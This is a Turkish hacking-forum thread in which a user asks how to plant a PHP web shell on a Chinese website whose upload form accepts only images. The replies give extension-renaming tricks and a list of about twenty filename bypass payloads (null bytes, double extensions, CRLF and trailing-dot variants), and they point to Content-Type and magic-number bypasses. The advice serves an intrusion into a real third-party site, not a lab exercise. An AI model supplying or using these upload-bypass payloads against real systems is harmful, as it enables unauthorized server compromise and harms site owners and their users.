Upload açığı buldum fakat sadece img formatı izni var nasıl shell basarım?

gme_0

Üye
5 Eyl 2023
60
11
bi tane çin sitesinde upload açığı buldum ama sadece img (jpg,jpeg,png)formatında olan dosyalara izin veriyor ben bu siteye php shell dosyasını nasıl atarım
 

louise0357

Anka Team Junior
21 Tem 2023
547
207
Medellín
bi tane çin sitesinde upload açığı buldum ama sadece img (jpg,jpeg,png)formatında olan dosyalara izin veriyor ben bu siteye php shell dosyasını nasıl atarım
bypass Deneyebilirsin.

Örneğin php dosyasının uzantısını " .php1 , .php2 , .php3 , .phtml " gibi değiştirerek deneyebilirsin.



Eğer sorunun çözüldü ise konuyu Çözüldü olarak işaretlemeyi unutma!
 

ExeOweR

Kıdemli Üye
5 Mar 2012
3,389
1,061
exe.php
Kod:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5...
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg

Bypass Content-Type, Magic Number, Compression Resizing bu bypass yöntemlerinide deneye bilirisin
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.